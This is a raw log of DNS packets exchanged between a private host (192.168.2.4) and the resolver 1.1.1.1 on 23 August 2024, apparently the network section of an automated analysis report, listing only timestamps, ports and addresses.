Aug 23, 2024 18:47:15.222445011 CEST	54964	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.223102093 CEST	60412	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.224071026 CEST	49299	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.224922895 CEST	63759	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.225919962 CEST	52706	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.226670027 CEST	58639	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.227267027 CEST	59150	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.228311062 CEST	61864	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.228789091 CEST	61341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.230052948 CEST	51554	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.230232000 CEST	51432	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.231522083 CEST	60738	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.232445955 CEST	64883	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.233211994 CEST	53	56989	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.233339071 CEST	53	49213	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.233350039 CEST	53	53985	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.233649015 CEST	53	65421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.234213114 CEST	59943	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.237473011 CEST	53	53276	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.238244057 CEST	53	63759	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.238398075 CEST	53	59394	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.239429951 CEST	53	54964	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.239442110 CEST	53	58639	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243830919 CEST	53	59150	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243848085 CEST	53	52706	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243856907 CEST	53	60412	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243868113 CEST	53	49726	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243877888 CEST	53	49299	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243882895 CEST	53	51432	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.243892908 CEST	53	61341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.245600939 CEST	53276	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.264031887 CEST	55298	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.268459082 CEST	60047	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.271593094 CEST	53	60738	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.271610975 CEST	53	64883	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.271735907 CEST	53	59943	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.271749020 CEST	53	53573	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.271925926 CEST	61495	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.272007942 CEST	53	63724	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272022009 CEST	53	53194	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272032976 CEST	53	63188	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272043943 CEST	53	50309	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272054911 CEST	53	60422	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272066116 CEST	53	61864	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.272077084 CEST	53	51554	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.281526089 CEST	53	55298	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.283662081 CEST	53	53276	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.283674002 CEST	53	60047	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.288717031 CEST	53	61495	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.295398951 CEST	53235	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.297291040 CEST	60064	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.297569036 CEST	61434	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.297732115 CEST	53148	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.297748089 CEST	55989	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.297895908 CEST	61809	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.298021078 CEST	54150	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.298145056 CEST	64934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.298271894 CEST	60967	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.298397064 CEST	58847	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.298526049 CEST	57028	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.299036026 CEST	57141	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.299638033 CEST	51937	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.299901962 CEST	59066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300096989 CEST	64866	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300174952 CEST	50961	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300460100 CEST	59003	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300642014 CEST	57982	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300699949 CEST	63650	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.300853014 CEST	63277	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.301517010 CEST	64711	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.308598995 CEST	53	60064	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.308773994 CEST	53	53235	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.308784008 CEST	53	57028	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.309536934 CEST	53	53148	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.309545994 CEST	53	60967	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.313364029 CEST	57273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.313474894 CEST	60558	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.313565969 CEST	58331	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.313602924 CEST	59001	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.313771009 CEST	61640	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.313807964 CEST	64299	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.314841032 CEST	61817	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.315097094 CEST	62157	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.315403938 CEST	60392	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.316096067 CEST	57561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.316169977 CEST	53	51937	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316181898 CEST	53	64934	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316190958 CEST	53	59003	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316200972 CEST	53	57141	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316210985 CEST	53	63277	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316220999 CEST	53	64866	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316226006 CEST	53	59066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.316236973 CEST	53	50961	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.317920923 CEST	50138	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.338990927 CEST	53	54150	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.340816021 CEST	54481	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.342936993 CEST	53	55989	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.343110085 CEST	53	57273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.343120098 CEST	53	58331	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345854998 CEST	53	61809	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345865011 CEST	53	64711	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345870018 CEST	53	58847	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345880032 CEST	53	59001	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345896006 CEST	53	61640	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345906019 CEST	53	57982	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345910072 CEST	53	64299	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345921040 CEST	53	62157	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345931053 CEST	53	63650	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345942020 CEST	53	60392	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.345954895 CEST	53	57561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.355876923 CEST	53	60558	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.358086109 CEST	53	54481	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.359208107 CEST	53	61817	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.363888025 CEST	53	50138	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.364289999 CEST	58296	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.382112980 CEST	53	58296	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.498873949 CEST	53	61434	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.563935041 CEST	51373	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.574069977 CEST	53	51373	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.782815933 CEST	53	54984	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.843209982 CEST	56775	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:16.496458054 CEST	53	56775	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:36.808643103 CEST	63539	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:36.833857059 CEST	53143	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:36.836477041 CEST	50003	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:36.854923010 CEST	53	63539	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:36.885438919 CEST	53	53143	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:36.893754005 CEST	53	50003	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.000771046 CEST	64705	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.004936934 CEST	65285	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.012491941 CEST	54431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.019927979 CEST	50293	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.023184061 CEST	52543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.026655912 CEST	57320	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.031167984 CEST	61700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.038492918 CEST	53	64705	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.038714886 CEST	53379	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.042779922 CEST	53	54431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.045559883 CEST	61793	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.053014994 CEST	53	50293	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.057693005 CEST	53	52543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.058971882 CEST	53	65285	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.059571981 CEST	53487	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.060077906 CEST	50851	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.060336113 CEST	63345	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.060741901 CEST	58699	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.060915947 CEST	60191	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.067194939 CEST	53	53379	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.073044062 CEST	53	61793	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.079309940 CEST	53	57320	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.084222078 CEST	53	61700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.084235907 CEST	53	50851	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.086267948 CEST	53	58699	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.104377985 CEST	64961	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.108556032 CEST	52876	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.108760118 CEST	64596	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.108916044 CEST	64482	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.109421015 CEST	65401	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.111695051 CEST	53	63345	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.112606049 CEST	53	53487	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.112617970 CEST	53	60191	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.124967098 CEST	63116	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.125277996 CEST	63952	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.131519079 CEST	53	64961	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.152654886 CEST	53	64482	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.156604052 CEST	53	64596	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.156615973 CEST	53	52876	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.170241117 CEST	53	63952	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.173518896 CEST	53	63116	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.187253952 CEST	57938	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.187491894 CEST	63255	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.187745094 CEST	53166	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.187889099 CEST	61756	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.188288927 CEST	61575	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.188438892 CEST	63622	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.188750982 CEST	65082	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.189007044 CEST	58494	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.189224005 CEST	59110	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.189615965 CEST	64465	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.189893961 CEST	54555	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.191452026 CEST	53604	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.191848040 CEST	52342	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.192034960 CEST	52057	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.192424059 CEST	57692	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.192869902 CEST	50930	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.193074942 CEST	61977	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.221111059 CEST	63534	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.221991062 CEST	59564	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.222311974 CEST	64314	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.222528934 CEST	61989	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.223839998 CEST	63488	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.224143982 CEST	55618	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.224522114 CEST	59614	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.224689007 CEST	53523	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.224859953 CEST	53352	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.225245953 CEST	57877	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.225471973 CEST	49679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.225682020 CEST	57325	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.228699923 CEST	53	57938	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.228809118 CEST	53	53166	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.228820086 CEST	53	65082	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.230321884 CEST	53	50930	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.230334997 CEST	53	52057	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.230345011 CEST	53	54555	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.230355024 CEST	53	61756	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.230372906 CEST	53	57692	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.241229057 CEST	53	52342	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.252109051 CEST	53	58494	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.252830029 CEST	53	64465	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.252842903 CEST	53	61977	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.254162073 CEST	53	53604	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.259603024 CEST	53	59564	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.259614944 CEST	53	64314	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.259624958 CEST	53	63488	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.271140099 CEST	53	53523	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.271632910 CEST	53	55618	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.271647930 CEST	53	57325	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.273103952 CEST	53	57877	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.276566029 CEST	52421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.276770115 CEST	54584	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.276941061 CEST	51862	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.277412891 CEST	59265	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.279663086 CEST	60912	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.282016039 CEST	58903	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.283670902 CEST	65311	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.283701897 CEST	61111	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.283900023 CEST	57914	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.283932924 CEST	64206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.284089088 CEST	65000	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.291471958 CEST	53	61989	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.291485071 CEST	53	63534	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.291493893 CEST	53	59614	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.296873093 CEST	53	53352	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.296885967 CEST	53	49679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.308409929 CEST	53	59265	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.311341047 CEST	53	60912	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.316302061 CEST	53	64206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.319160938 CEST	58062	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.319241047 CEST	53	61111	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.330874920 CEST	53	51862	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.330888033 CEST	53	54584	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.330895901 CEST	53	58903	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.333854914 CEST	53	65311	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.336671114 CEST	53	57914	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.373155117 CEST	53	63622	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.377871037 CEST	53	61575	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.409786940 CEST	53	59110	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.444397926 CEST	53	52421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.455167055 CEST	53	58062	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.456842899 CEST	53	65401	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.543504000 CEST	51964	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.566437006 CEST	53	51964	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.612678051 CEST	53	65000	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:37.679685116 CEST	51560	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.687506914 CEST	50491	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.700576067 CEST	56985	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:37.719563961 CEST	53	56985	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.017304897 CEST	53	51560	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.087523937 CEST	53	50491	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.191203117 CEST	63255	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:38.287389040 CEST	53	63255	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.291616917 CEST	53	63255	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.396585941 CEST	50902	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:38.435899973 CEST	60717	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:38.466334105 CEST	53	60717	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:38.718096972 CEST	61417	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:38.734062910 CEST	53	50902	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.237541914 CEST	53	61417	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:39.927797079 CEST	55491	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.928783894 CEST	50272	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.929482937 CEST	62211	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.930449009 CEST	57932	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.931091070 CEST	64840	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.932106018 CEST	57540	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.932811975 CEST	61911	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.933449030 CEST	51721	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.933892012 CEST	57845	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.934165955 CEST	51214	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.934484005 CEST	56099	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.934928894 CEST	51468	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.935065985 CEST	63840	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.935616016 CEST	55301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.935616016 CEST	62286	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.936150074 CEST	63561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.936448097 CEST	61183	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.936556101 CEST	55304	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.936959028 CEST	65056	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.936980963 CEST	49368	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.937561989 CEST	58652	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.937653065 CEST	58047	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.938122034 CEST	58760	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.938429117 CEST	63484	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.938456059 CEST	63248	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.938992023 CEST	59317	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.939346075 CEST	55827	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.939557076 CEST	63676	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.942476034 CEST	53218	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.944300890 CEST	52739	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.944571018 CEST	59957	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.944725037 CEST	56734	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945008039 CEST	54992	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945166111 CEST	53124	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945319891 CEST	49898	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945471048 CEST	65385	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945636988 CEST	50904	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945774078 CEST	54497	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.945954084 CEST	58785	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.946342945 CEST	53998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.946511030 CEST	63059	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.946679115 CEST	52579	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.946830034 CEST	56332	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.946990967 CEST	53993	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.947978020 CEST	63398	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.948793888 CEST	52002	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.948828936 CEST	55482	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949029922 CEST	59453	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949052095 CEST	60038	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949218035 CEST	61184	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949254036 CEST	57433	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949395895 CEST	50447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949456930 CEST	52189	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949573040 CEST	49446	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949636936 CEST	51206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949748039 CEST	64900	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949820995 CEST	55164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.949911118 CEST	56925	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.950181007 CEST	64830	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.950669050 CEST	61832	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.950850010 CEST	60293	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.951057911 CEST	65026	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.951260090 CEST	63387	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.951673985 CEST	58846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:39.970561981 CEST	53	55491	1.1.1.1	192.168.2.4
